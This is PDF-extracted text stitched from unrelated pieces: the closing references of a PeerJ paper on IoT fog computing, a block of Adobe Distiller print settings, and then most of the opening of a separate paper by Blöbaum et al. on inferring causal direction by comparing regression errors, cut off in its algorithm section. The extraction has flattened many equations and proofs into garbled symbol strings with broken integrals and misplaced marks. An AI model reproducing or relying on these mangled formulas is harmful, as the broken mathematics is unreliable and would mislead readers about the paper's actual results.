8:88700–88716 DOI 10.1109/ACCESS.2020.2992467. Yang H-K, Cha H-J, Song Y-J. 2018. Secure identifier management based on blockchain technology in ndn environment. IEEE Access 7:6262–6268 DOI 10.1109/ACCESS.2018.2885037. Yi S, Li C, Li Q. 2015. A survey of fog computing: concepts, applications and issues. In: Proceedings of the 2015 Workshop on Mobile Big Data, 37–42. Yoon G, Choi D, Lee J, Choi H. 2019. Management of iot sensor data using a fog computing node. Journal of Sensors 2019(1):1–9 DOI 10.1155/2019/5107457. Zhu T, Shi T, Li J, Cai Z, Zhou X. 2018. Task scheduling in deadline-aware mobile edge computing systems. IEEE Internet of Things Journal 6(3):4854–4866 DOI 10.1109/JIOT.2018.2874954. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 34/34 http://dx.doi.org/10.1016/j.future.2016.11.009 http://dx.doi.org/10.1016/j.adhoc.2020.102253 http://dx.doi.org/10.1109/ACCESS.2017.2757955 https://tools.ietf.org/html/rfc7252 http://dx.doi.org/10.1016/j.cmpb.2019.105054 http://dx.doi.org/10.3390/s100302359 http://dx.doi.org/10.1109/MCOM.2014.6736753 http://dx.doi.org/10.1109/ACCESS.2020.2992467 http://dx.doi.org/10.1109/ACCESS.2018.2885037 http://dx.doi.org/10.1155/2019/5107457 http://dx.doi.org/10.1109/JIOT.2018.2874954 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ A novel IoT-based health and tactical analysis model with fog computing Introduction Fog computing features and security needs Proposed model Analysis of the proposed model Simulation of the proposed model Challenges in wearable technologies and future works Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3jstltojlnahjhwxdidtdnycqy ---- Submitted 18 September 2018 Accepted 16 December 2018 Published 21 January 2019 Corresponding author Patrick Blöbaum, bloebaum@ar.sanken.osaka-u.ac.jp Academic editor Charles Elkan Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.169 Copyright 2019 Blöbaum et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Analysis of cause-effect inference by comparing regression errors Patrick Blöbaum1, Dominik Janzing2, Takashi Washio1, Shohei Shimizu3 and Bernhard Schölkopf2 1 Osaka University, Osaka, Japan 2 MPI for Intelligent Systems, Tübingen, Germany 3 Shiga University, Shiga, Japan ABSTRACT We address the problem of inferring the causal direction between two variables by comparing the least-squares errors of the predictions in both possible directions. Under the assumption of an independence between the function relating cause and effect, the conditional noise distribution, and the distribution of the cause, we show that the errors are smaller in causal direction if both variables are equally scaled and the causal relation is close to deterministic. Based on this, we provide an easily applicable algorithm that only requires a regression in both possible causal directions and a comparison of the errors. The performance of the algorithm is compared with various related causal inference methods in different artificial and real-world data sets. Subjects Artificial Intelligence, Data Mining and Machine Learning Keywords Causality, Causal discovery, Cause-effect inference INTRODUCTION Causal inference (Spirtes, Glymour & Scheines, 2000; Pearl, 2009) is becoming an increasingly popular topic in machine learning. The results are often not only of interest in predicting the result of potential interventions, but also in general statistical and machine learning applications (Peters, Janzing & Schölkopf, 2017). While the causal relationship between variables can generally be discovered by performing specific randomized experiments, such experiments can be very costly, infeasible or unethical1. In particular, the identification of the causal direction between two variables without performing any interventions is a challenging task. However, recent research developments in causal discovery allow, under certain assumptions, inference of the causal direction between two variables purely based on observational data (Kano & Shimizu, 2003; Comley & Dowe, 2003; Shimizu et al., 2006; Sun, Janzing & Schölkopf, 2006; Zhang & Hyvärinen, 2009; Hoyer et al., 2009; Janzing, Sun & Schölkopf, 2009; Daniušis et al., 2010; Peters, Janzing & Schölkopf, 2011; Janzing et al., 2012; Sgouritsa et al., 2015; Mooij et al., 2016; Marx & Vreeken, 2017). In regard to the present work, we further contribute to the causal discovery in an unconfounded bivariate setting based on observational data, where one variable is the cause and the other variable is the effect. That is, given observed data X,Y that are drawn from a joint distribution pX,Y , we are interested in inferring whether X caused Y or Y caused X. In this sense, we define X as the cause and Y as the effect if intervening on X How to cite this article Blöbaum P, Janzing D, Washio T, Shimizu S, Schölkopf B. 2019. Analysis of cause-effect inference by comparing regression errors. PeerJ Comput. Sci. 5:e169 http://doi.org/10.7717/peerj-cs.169 https://peerj.com mailto:bloebaum@ar.sanken.osaka-u.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.169 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.169 1Further discussions about ethics in randomized experiments, especially in the context of clinical trials, can be found in Rosner (1987). 2The data is taken from https://webdav. tuebingen.mpg.de/cause-effect/ and further discussed in Mooij et al. (2016). 0 2 4 6 8 10 National Income (in USD) 104 40 50 60 70 80 90 L ife E xp e ct a n cy ( in y e a rs ) 40 50 60 70 80 90 Life Expectancy (in years) 0 2 4 6 8 10 N a tio n a l I n co m e ( in U S D ) 10 4 (a) (b) Figure 1 A comparison of the national income of 194 countries and the life expectancy at birth. (A) The national income on the x-axis and the life expectancy on the y-axis. (B) The life expectancy on the x- axis and the national income on the y-axis. Full-size DOI: 10.7717/peerjcs.169/fig-1 changes the distribution of Y . In the following, we use the term ’causal inference’ to refer to the identification of the true causal direction. A possible application is the discovery of molecular pathways, which relies on the identification of causal molecular interactions in genomics data (Statnikov et al., 2012). Other examples in biomedicine where observational data can be used for causal discovery are discussed in the work by Ma & Statnikov (2017). An example for a bivariate relationship is provided in Fig. 1, where the national income of countries are compared with the life expectancy at birth2. Here, a clear statement about the causal relationship is not obvious. It has been argued that richer countries have a better health care system than poorer countries. Hence, a higher national income leads to a higher life expectancy (Mooij et al., 2016). Based on the plots, this causal relationship is not clear at all. Nevertheless, we provide a way to correctly determine the causal direction by only using these data points. Conventional approaches to causal inference rely on conditional independences and therefore require at least three observed variables. Given the observed pattern of conditional dependences and independences, one infers a class of directed acyclic graphs (DAGs) that is compatible with the respective pattern (subject to Markov condition and faithfulness assumption (Spirtes, Glymour & Scheines, 2000; Pearl, 2009)). Whenever there are causal arrows that are common to all DAGs in the class, conditional (in)dependences yield definite statements about causal directions. In a bivariate setting, however, we rely on asymmetries between cause and effect that are already apparent in the bivariate distribution alone. One kind of asymmetry is given by restricting the structural equations relating cause and effect to a certain function class: For linear relations with non-Gaussian independent noise, the linear non-Gaussian acyclic model (LiNGAM) (Shimizu et al., 2006) provides a method to identify the correct causal direction. For nonlinear relations, the additive noise model (ANM) (Hoyer et al., 2009) and its generalization to post-nonlinear models (PNL) (Zhang & Hyvärinen, 2009) identify the causal direction by assuming an independence Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 2/29 https://webdav.tuebingen.mpg.de/cause-effect/ https://webdav.tuebingen.mpg.de/cause-effect/ https://peerj.com https://doi.org/10.7717/peerjcs.169/fig-1 http://dx.doi.org/10.7717/peerj-cs.169 between cause and noise, where, apart from some exceptions such as bivariate Gaussian, a model can only be fit in the correct causal direction such that the input is independent of the residual. Further recentapproaches forthe bivariatesetting arebased on an informal independence assumption stating that the distribution of the cause (denoted by pC) contains no information about the conditional distribution of the effect given the cause (denoted by pE|C). Here, the formalization of ‘no information’ is a challenging task. For the purpose of foundational insights (rather than for practical purposes), Janzing & Schölkopf (2010) and Lemeire & Janzing (2012) formalize the idea via algorithmic information and postulate that knowing pC does not enable a shorter description of pE|C and vice versa. Using algorithmic information theory, one can, for instance, show that the algorithmic independence of pC and pE|C implies K(pC)+K(pE|C)≤K(pE)+K(pC|E), (1) if K denotes the description length of a distribution in terms of its Kolmogorov complexity (for details see Section 4.1.9 in Peters, Janzing & Schölkopf (2017)). In this sense, appropriate independence assumptions between pC and pE|C imply that pE,C has a simpler description in causal direction than in anticausal direction. An approximation of (1) is given by the SLOPE algorithm in the work by Marx & Vreeken (2017), where regression is utilized to estimate and compare the approximated Kolmogorov complexities. For this, a logarithmic error is used, which is motivated by a minimum description length perspective. Another work that is inspired by the independence assumption is the information-geometric approach for causal inference (IGCI) (Janzing et al., 2012). IGCI provides a method to infer the causal direction in deterministic nonlinear relationships subject to a certain independence condition between the slope of the function and the distribution of the cause. A related but different independence assumption is also used by a technique called unsupervised inverse regression (CURE) (Sgouritsa et al., 2015), where the idea is to estimate a prediction model of both possible causal directions in an unsupervised manner, i.e., only the input data is used for the training of the prediction models. With respect to the above independence assumption, the effect data may contain information about the relation between cause and effect that can be employed for predicting the cause from the effect, but the cause data alone does not contain any information that helps the prediction of the effect from the cause (as hypothesized in Schölkopf et al. (2013)). Accordingly, the unsupervised regression model in the true causal direction should be less accurate than the prediction model in the wrong causal direction. For our approach, we address the causal inference problem by exploiting an asymmetry in the mean-squared error (MSE) of predicting the cause from the effect and the effect from the cause, respectively, and show, that under appropriate assumptions and in the regime of almost deterministic relations, the prediction error is smaller in causal direction. A preliminary version of this idea can be found in Blöbaum, Washio & Shimizu (2017) and Blöbaum, Shimizu & Washio (2017) but in these works the analysis is based on a simple heuristic assuming that the regression of Y on X and the regression of X on Y yield functions that are inverse to each other, which holds approximately in the limit of small Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 3/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 or ? Figure 2 An illustration of the goal of our proposed method. It aims to identify the causal DAG of two variables, where either X causes Y or Y causes X. Full-size DOI: 10.7717/peerjcs.169/fig-2 noise. Moreover, the analysis is also based on the assumption of an additive noise model in causal direction and on having prior knowledge about the functional relation between X and Y , which makes it impractical for generic causal inference problems. In this work, we aim to generalize and extend the two aforementioned works in several ways: (1) We explicitly allow a dependency between cause and noise. (2) We give a proper mathematical proof of the theory that justifies the method subject to clear formal assumptions. (3) We perform extensive evaluations for the application in causal inference and compare it with various related approaches. The theorem stated in this work might also be of interest for general statistical purposes. A briefer version of this work with less extensive experiments, lesser details and without detailed proofs can be found in Blöbaum et al. (2018). This paper is structured as follows: In ‘Preliminaries’, we define the problem setting and introduce the used notations and assumptions, which are necessary for the main theorem of this work stated in ‘Theory’. An algorithm that utilizes this theorem is proposed in Algorithm and evaluated in various artificial and real-world data sets in ‘Experiments’. PRELIMINARIES In the following, we introduce the preliminary problem setting, notations and assumptions. Problem setting and notation In this work, we use the framework of structural causal models (Pearl, 2009) with the goal of correctly identifying cause and effect variables of given observations from X and Y . As illustrated in Fig. 2, this can be described by the problem of identifying whether the causal DAG of X →Y or X ←Y is true. Throughout this paper, a capital letter denotes a random variable and a lowercase letter denotes values attained by the random variable. Variables X and Y are assumed to be real-valued and to have a joint probability density (with respect to the Lebesgue measure), denoted by pX,Y . By slightly abusing terminology, we will not further distinguish between a distribution and its density since the Lebesgue measure as a reference is implicitly understood. The notations pX , pY , and pY |X are used for the corresponding marginal and conditional densities, respectively. The derivative of a function f is denoted by f ′. General idea As mentioned before, the general idea of our approach is to simply compare the MSE of regressing Y on X and the MSE of regressing X on Y . If we denote cause and effect Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 4/29 https://peerj.com https://doi.org/10.7717/peerjcs.169/fig-2 http://dx.doi.org/10.7717/peerj-cs.169 3Note that although the form of (5) is similar to that of ANM, the core assumption of ANM is an independence between cause and noise, which we do not need in our approach. Therefore, we assume the general structural equation defined in (3), whereas ANM assumes a more restrictive structural equation of the form E =ζ(C)+Ñ with CyÑ . by C,E ∈{X,Y}, respectively, our approach explicitly reads as follows. Let φ denote the function that minimizes the expected least squares error when predicting E from C, which implies that φ is given by the conditional expectation φ(c)=E[E|c]. Likewise, let ψ be the minimizer of the least squares error for predicting C from E, that is, ψ(e)=E[C|e]. Then we will postulate assumptions that imply E[(E−φ(C))2]≤E[(C−ψ(E))2] (2) in the regime of almost deterministic relations. This conclusion certainly relies on some kind of scaling convention. For our theoretical results we will assume that both X and Y attain values between 0 and 1. However, in some applications, we will also scale X and Y to unit variance to deal with unbounded variables. Equation (2) can be rewritten in terms of conditional variance as E[Var[E|C]]≤E[Var[C|E]]. Assumptions First, recall that we assume throughout the paper that either X is the cause of Y or vice versa in an unconfounded sense, i.e., there is no common cause. Therefore, the general structural equation is defined as E =ζ(C,Ñ), (3) where CyÑ . For our analysis, we first define a function φ to be the conditional expectation of the effect given the cause, i.e., φ(c) :=E[E|c] and, accordingly, we define a noise variable N as the residual N :=E−φ(C). (4) Note that (4) implies that E[N|c]=0. The function φ is further specified below. Then, to study the limit of an almost deterministic relation in a mathematically precise way, we consider a family of effect variables Eα by Eα :=φ(C)+αN, (5) where α∈R+ is a parameter controlling the noise level and N is a noise variable that has some (upper bounded) joint density pN,C with C. Note that N here does not need to be statistically independent of C (in contrast to ANMs), which allows the noise to be non-additive. Therefore, (5) does not, a priori, restrict the set of possible causal relations, because for any pair (C,E) one can always define the noise N as (4) and thus obtain Eα=1=E for any arbitrary function φ3. For this work, we make use of the following assumptions: 1. Invertible function: φ is a strictly monotonically increasing two times differentiable function φ : [0,1]→[0,1]. For simplicity, we assume that φ is monotonically increasing with φ(0)=0 and φ(1)=1 (similar results for monotonically decreasing functions follow by reflection E →1−E). We also assume that φ−1 ′ is bounded. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 5/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 4Note, however, that the assignment (5) is not a structural equation in a strict sense, because then C and N would need to be statistically independent. 2. Compact supports: The distribution of C has compact support. Without loss of generality, we assume that 0 and 1 are, respectively, the smallest and the largest values attained by C. We further assume that the distribution of N has compact support and that there exist values n+ > 0 > n− such that for any c, [n−,n+] is the smallest interval containing the support of pN|c. This ensures that we know [αn−,1+αn+] is the smallest interval containing the support of pEα. Then the shifted and rescaled variable Ẽα := 1 1+αn+−αn− (Eα−αn−) (6) attains 0 and 1 as minimum and maximum values and thus is equally scaled as C. 3. Unit noise variance: The expected conditional noise variance is E[Var[N|C]]=1 without loss of generality, seeing that we can scale the noise arbitrary by the parameter α and we are only interested in the limit α→0. 4. Independence postulate: While the above assumptions are just technical, we now state the essential assumption that generates the asymmetry between cause and effect. To this end, we consider the unit interval [0,1] as probability space with uniform distribution as probability measure. The functions c 7→φ′(c) and c 7→Var[N|c]pC(c) define random variables on this space, which we postulate to be uncorrelated, formally stated as Cov[φ′,Var[N|c]pC]=0. (7) More explicitly, (7) reads:∫ 1 0 φ ′(c)Var[N|c]pC(c)dc− ∫ 1 0 φ ′(c)dc ∫ 1 0 Var[N|c]pC(c)dc =0. (8) The justification of (7) is not obvious at all. For the special case where the conditional variance Var[N|c] is a constant in c (e.g., for ANMs), (7) reduces to Cov[φ′,pC]=0, (9) which is an independence condition for deterministic relations stated in Schölkopf et al. (2013). Conditions of similar type as (9) have been discussed and justified in Janzing et al. (2012). They are based on the idea that φ contains no information about pC. This, in turn, relies on the idea that the conditional pE|C contains no information about pC. To discuss the justification of (8), observe first that it cannot be justified as stating some kind of ‘independence’ between pC and pE|C. To see this, note that (8) states an uncorrelatedness of the two functions c 7→φ′(c) and c 7→Var[N|c]pC(c). While φ′ depends only on the conditional pE|C and not on pC, the second function depends on both pC|E and pE, since Var[N|c] is a property of pE|C. Nevertheless, to justify (8) we assume that the function φ represents a law of nature that persists when pC and N change due to changing background conditions. From this perspective, it becomes unlikely that they are related to the background condition at hand. This idea follows the general spirit of ‘modularity and autonomy’ in structural equation modeling, that some structural equations may remain unchanged when other parts of a system change (see Chapter 2 in Peters, Janzing & Schölkopf (2017) for a literature review)4. To further justify (7), one could think of a scenario where someone changes φ independently of pN,C, which then results in vanishing correlations. Typically, this assumption would be violated if φ is adjusted to pN,C or vice versa. This could happen due to an intelligent design by, for instance, first Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 6/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 observing pN,C and then defining φ or due to a long adaption process in nature (see Janzing et al. (2012) for further discussions of possible violations in a deterministic setting). A simple implication of (8) reads∫ 1 0 φ ′(c)Var[N|c]pC(c)dc =1, (10) due to ∫ 1 0 φ ′(c)dc =1 and ∫ 1 0 Var[N|c]pC(c)dc =E[Var[N|C]]=1. In the following, the term independence postulate is used to refer to the aforementioned postulate and the term independence to a statistical independence, which should generally become clear from the context. THEORY As introduced in ‘General idea’, we aim to exploit an inequality of the expected prediction errors in terms of E[Var[E|C]]≤E[Var[C|E]] to infer the causal direction. In order to conclude this inequality and, thus, to justify an application to causal inference, we must restrict our analysis to the case where the noise variance is sufficiently small, since a more general statement is not possible under the aforementioned assumptions. The analysis can be formalized by the ratio of the expectations of the conditional variances in the limit α→0. We will then show lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] ≥1. Error asymmetry theorem For our main theorem, we first need an important lemma: Lemma 1 (Limit of variance ratio) Let the assumptions 1–3 in ‘Assumptions’ hold. Then the following limit holds: lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] = ∫ 1 0 1 φ′(c)2 Var[N|c]pC(c)dc (11) Proof: We first give some reminders of the definition of the conditional variance and some properties. For two random variables Z and Q the conditional variance of Z, given q is defined by Var[Z|q] :=E[(Z−E[Z|q])2|q], while Var[Z|Q] is the random variable attaining the value Var[Z|q] when Q attains the value q. Its expectation reads E[Var[Z|Q]] := ∫ Var[Z|q]pQ(q)dq. For any a∈R, we have Var [ Z a ∣∣q]= Var[Z|q] a2 . Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 7/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 For any function h, we have Var[h(Q)+Z|q]=Var[Z|q], which implies Var[h(Q)|q]=0. Moreover, we have Var[Z|h(q)]=Var[Z|q], if h is invertible. To begin the main part of the proof, we first observe E[Var[Eα|C]]=E[Var[φ(C)+αN|C]]=α2 E[Var[N|C]]︸︷︷︸ = 1 (Assumpt. 3)) =α 2 . (12) Moreover, one easily verifies that lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] = lim α→0 E[Var[C|Eα]] E[Var[Eα|C]] , (13) due to (6) provided that these limits exist. Combining Eqs. (12) and (13) yields lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] = lim α→0 E[Var[C|Eα]] α2 = lim α→0 E [ Var [ C α ∣∣Eα]]. (14) Now, we can rewrite (14) as lim α→0 E [ Var [ C α ∣∣Eα]]= lim α→0 E [ Var [ φ−1(Eα−αN) α ∣∣Eα]] = lim α→0 ∫ φ(1)+αn+ φ(0)+αn− Var [ φ−1(e−αN) α ∣∣e]pEα(e)de = lim α→0 ∫ φ(1) φ(0) Var [ φ−1(e−αN) α ∣∣e]pEα(e)de. (15) In the latter step, αn+ and −αn− vanishes in the limit seeing that the function e 7→Var [ φ −1(e−αN)/α ∣∣e]pEα(e) is uniformly bounded in α. This is firstly, because φ−1 attains only values in [0,1], and hence the variance is bounded by 1. Secondly, pEα(e) is uniformly bounded due to pEα(e)= ∫ n+ n− pφ(C),N (e−αn,n)dn= ∫ n+ n− pC,N (φ −1(e−αn),n)φ−1 ′ (e−αn)dn ≤‖φ −1′ ‖∞‖pC,N‖∞(n+−n−). Accordingly, the bounded convergence theorem states lim α→0 ∫ φ(1) φ(0) Var [ φ−1(e−αN) α ∣∣e]pEα(e)de=∫ φ(1) φ(0) lim α→0 ( Var [ φ−1(e−αN) α ∣∣e]pEα(e))de. To compute the limit of Var [ φ−1(e−αN) α ∣∣e], Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 8/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 we use Taylor’s theorem to obtain φ −1(e−αn)=φ−1(e)−αnφ−1 ′ (e)− α2n2φ−1 ′′ (E2(n,e)) 2 , (16) where E2(n,e) is a real number in the interval (e−αn,e). Since (16) holds for every n∈[− e α , 1−e α ] (note that φ and φ−1 are bijections of [0,1], thus e−αn lies in [0,1]) it also holds for the random variable N if E2(n,e) is replaced with the random variable E2(N,e) (here, we have implicitly assumed that the map n 7→e2(n,e) is measurable). Therefore, we see that lim α→0 Var [ φ−1(e−αN) α ∣∣e]= lim α→0 Var [ −Nφ−1 ′ (e)− αN 2φ−1 ′′ (E2(N,e)) 2 ∣∣e ] =φ −1′(e)2Var[N|e]. (17) Moreover, we have lim α→0 pEα(e)=pE0(e). (18) Inserting Eqs. (18) and (17) into (15) yields lim α→0 E [ Var [ C α ∣∣E0]]=∫ φ(1) φ(0) φ −1′(e)2Var[N|e]pE0(e)de = ∫ 1 0 φ −1′(φ(c))2Var[N|φ(c)]pC(c)dc = ∫ 1 0 1 φ′(c)2 Var[N|c]pC(c)dc, where the second equality is a variable substitution using the deterministic relation E0 =φ(C) (which implies pE0(φ(c))=pC(c)/φ ′(c) or, equivalently, the simple symbolic equation pE0(e)de=pC(c)dc). This completes the proof due to (14). � While the formal proof is a bit technical, the intuition behind this idea is quite simple: just think of the scatter plot of an almost deterministic relation as a thick line. Then Var[Eα|c] and Var[C|Eα =φ(c)] are roughly the squared widths of the line at some point (c,φ(c)) measured in vertical and horizontal direction, respectively. The quotient of the widths in vertical and horizontal direction is then given by the slope. This intuition yields the following approximate identity for small α: Var[C|Ẽα=φ(c)]≈ 1 (φ′(c))2 Var[Ẽα|C =c]=α 2 1 (φ′(c))2 Var[N|c]. (19) Taking the expectation of (19) over C and recalling that Assumption 3 implies E[Var[Ẽα|C]]=α2E[Var[N|C]]=α2 already yields (11). With the help of Lemma 1, we can now formulate the core theorem of this paper: Theorem 1 (Error Asymmetry) Let the assumptions 1–4 in ‘Assumptions’ hold. Then the following limit always holds lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] ≥1, with equality only if the function stated in Assumption 1 is linear. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 9/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 Proof: We first recall that Lemma 1 states lim α→0 E[Var[C|Ẽα]] E[Var[Ẽα|C]] = ∫ 1 0 1 φ′(c)2 Var[N|c]pC(c)dc. We then have∫ 1 0 1 φ′(c)2 Var[N|c]pC(c)dc = ∫ 1 0 1 φ′(c)2 Var[N|c]pC(c)dc · ∫ 1 0 Var[N|c]pC(c)dc︸︷︷︸ = 1 (Assumpt. 3) = ∫ 1 0 √( 1 φ′(c) )2 Var[N|c] 2 pC(c)dc · ∫ 1 0 √ Var[N|c] 2 pC(c)dc ≥  ∫ 1 0 √( 1 φ′(c) )2 Var[N|c] √ Var[N|c]pC(c)dc  2 = (∫ 1 0 1 φ′(c) Var[N|c]pC(c)dc )2 , (20) where the inequality is just the Cauchy Schwarz inequality applied to the bilinear form f ,g 7→ ∫ f (c)g(c)pC(c)dc for the space of functions f for which ∫ f 2(c)pc(c)dc exists. Note that if φ is linear, (20) becomes 1, since φ′=1 according to Assumpt. 1. We can make a statement about (20) in a similar way by using (10) implied by the independence postulate and using Cauchy Schwarz:∫ 1 0 1 φ′(c) Var[N|c]pC(c)dc = ∫ 1 0 1 φ′(c) Var[N|c]pC(c)dc · ∫ 1 0 φ ′(c)Var[N|c]pC(c)dc︸︷︷︸ = 1 (10) = ∫ 1 0 √ 1 φ′(c) Var[N|c] 2 pC(c)dc · ∫ 1 0 √ φ′(c)Var[N|c] 2 pC(c)dc ≥ (∫ 1 0 √ 1 φ′(c) Var[N|c] √ φ′(c)Var[N|c]pC(c)dc )2 =   ∫ 1 0 Var[N|c]pC(c)dc︸︷︷︸ = 1 (Assumpt. 3)   2 =1. (21) Combining Eqs. (20) and (21) with Lemma 1 completes the proof. � Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 10/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 Remark Theorem 1 states that the inequality holds for all values of α smaller than a certain finite threshold. Whether this threshold is small or whether the asymmetry with respect to regression errors already occurs for large noise cannot be concluded from the theoretical insights. Presumably, this depends on the features of φ, pC, pN|C in a complicated way. However, the experiments in ‘Experiments’ suggest that the asymmetry often appears even for realistic noise levels. If the function φ is non-invertible, there is an information loss in anticausal direction, since multiple possible values can be assigned to the same input. Therefore, we can expect that the error difference becomes even higher in these cases, which is supported by the experiments in ‘Simulated cause–effect pairs with strong dependent noise’. ALGORITHM A causal inference algorithm that exploits Theorem 1 can be formulated in a straightforward manner. Given observations X,Y sampled from a joint distribution pX,Y , the key idea is to fit regression models in both possible directions and compare the MSE. We call this approach Regression Error based Causal Inference (RECI) and summarize the algorithm in Algorithm 1. Although estimating the conditional expectations E[Y |X] and E[X|Y] by regression is a standard task in machine learning, we should emphasize that the usual issues of over- and underfitting are critical for our purpose (like for methods based on ANMs 